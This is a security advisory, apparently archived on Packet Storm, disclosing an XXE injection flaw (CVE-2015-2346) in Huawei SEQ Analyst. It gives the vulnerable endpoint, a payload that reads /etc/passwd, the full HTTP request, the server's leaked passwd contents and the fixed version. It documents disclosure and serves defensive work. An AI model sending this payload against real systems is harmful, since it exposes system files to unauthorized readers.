exploit the possibilities

Huawei SEQ Analyst XXE Injection

Huawei SEQ Analyst XXE Injection
Posted Apr 16, 2015
Authored by Ugur Cihan KOC

Huawei SEQ Analyst version V200R002C03LG0001SPC100 suffers from an XML external entity injection vulnerability.

tags | exploit, xxe
advisories | CVE-2015-2346
MD5 | 5284b1f07ef59d65a778895ed54cf99d

Huawei SEQ Analyst XXE Injection

Change Mirror Download
#Document Title:
============
Huawei SEQ Analyst - XML External Entity Injection (XXE)

#Release Date:
===========
15 Apr 2015

#CVE-ID:
=======
CVE-2015-2346

#Product & Service Introduction:
=======================
SEQ Analyst is a platform for business quality monitoring and management by
individual user and multiple vendors in a quasi-realtime and retraceable
manner
More Details & Manual ;
http://download.huawei.com/download/filedownload.do?modelID=bulletin&refID=IN0000056669,101

#Vulnerability Disclosure Timeline:
========================
3 Mar 2015 Bug reported to the vendor.
6 Mar 2015 Vendor returned ; investigating
16 Mar 2015 Asked about the case.
16 Mar 2015 Vendor has validated the issue.
17 Mar 2015 There aren't any fix the issue.
18 Mar 2015 CVE number assigned
15 Apr 2015 Fixed

#Affected Product(s):
===============
Huawei Technologies Co. Ltd.
Product: Huawei SEQ Analyst V200R002C03LG0001SPC100 (other versions may be
vulnerable)

#Exploitation Technique:
=================
Local, Authenticated

#Technical Details:
========================
Target Path: /monitor/flexdata.action
Sample Payload : <!DOCTYPE foo [<!ENTITY xxe00c70 SYSTEM
"file:///etc/passwd"> ]>
Affected Parameter: req

#Proof of Concept (PoC):
==================
https://drive.google.com/file/d/0B-LWHbwdK3P9YnVvYXFFZWZKc0k/view?usp=sharing

Request:

POST /monitor/flexdata.action HTTP/1.1
Host: ***:8443
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:36.0) Gecko/20100101
Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: JSESSIONID=C07AC243148F4C6F7677E90C1085C2D3;
org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE=en_US;
locale=en_US; locked=false;
timeNum=1425365144829; timeState=true; loginUserName=testsms;
CASTGC=TGT-549-
skiUgOJowwMXhTwxQ4bH1iHB2XKWmKcJVLJYIlthZ56kqJ9yAZ-cas; lockScreen=false
Connection: keep-alive
Referer: https://
***:8443/monitor/flexrelease/AllNetMonitor.swf/[[DYNAMIC]]/5
Content-type: application/x-www-form-urlencoded
Content-Length: 136

req=<!DOCTYPE%20foo%20[<!ENTITY%20xxe00c70%20SYSTEM%20"file%3a%2f%2f%2fetc%2fpasswd">%20]><Req>%0a%20%20<c
ommand>bizLicenseSetting%26xxe00c70%3b<%2fcommand>%0a<%2fReq>&rdm=Tue%20Mar%203%2008%3A45%3A50%20GMT%2B020
0%202015

Response:

HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 06:46:29 GMT
Server: Apache-Coyote/1.1
Cache- Control: no- cache, no-store
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 4281
<html>
<head>
<style type="text/css">

<tr class="row_even">
<td class="cell_object">1</td>
<td class="cell_object">2〕Command is
bizLicenseSettingnobody:x:65534:65533:nobody:/var/lib/nobody:/bin/false
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:Daemon:/sbin:/bin/false
ftp:x:40:49:FTP account:/srv/ftp:/bin/false
root:x:0:0:root:/root:/bin/bash
messagebus:x:103:101:User for D-Bus:/var/run/dbus:/bin/false
ntp:x:74:102:NTP daemon:/var/lib/ntp:/bin/false
ftpsecure:x:104:65534:Secure FTP User:/var/lib/empty:/bin/false
polkituser:x:105:103:PolicyKit:/var/run/PolicyKit:/bin/false
haldaemon:x:106:104:User for haldaemon:/var/run/hald:/bin/false
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
webserver:x:360:1800::/home/webserver:/bin/bash
ecmftp:x:1000:1800::/opt/pub/software:/bin/bash
ftptest:x:1001:1800::/opt/webserver/workspaces/ftp:/bin/bash
httpd:x:361:1801::/home/httpd:/bin/bash
cognos:x:1002:1802::/home/cognos:/bin/bash
ftptrace:x:1003:1800::/opt/webserver/workspaces/ftp/traceserver:/bin/bash
ftpsoc:x:1004:1800::/opt/pub/software:/bin/bash
ftprtmu:x:1005:1800::/opt/webserver/workspaces/ftp/rtmu:/bin/bash</td>
</tr>
<tr class="row_odd">
...

#Solution Fix & Patch:
================
15 Apr 2015 Fixed version --> SEQ Analyst V200R002C03LG0001CP0022

#Credits & Authors:
==============
Ugur Cihan Koc
@_uceka_
www.uceka.com


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    28 Files
  • 2
    Nov 2nd
    1 Files
  • 3
    Nov 3rd
    1 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    19 Files
  • 6
    Nov 6th
    65 Files
  • 7
    Nov 7th
    22 Files
  • 8
    Nov 8th
    18 Files
  • 9
    Nov 9th
    1 Files
  • 10
    Nov 10th
    1 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    65 Files
  • 13
    Nov 13th
    27 Files
  • 14
    Nov 14th
    22 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close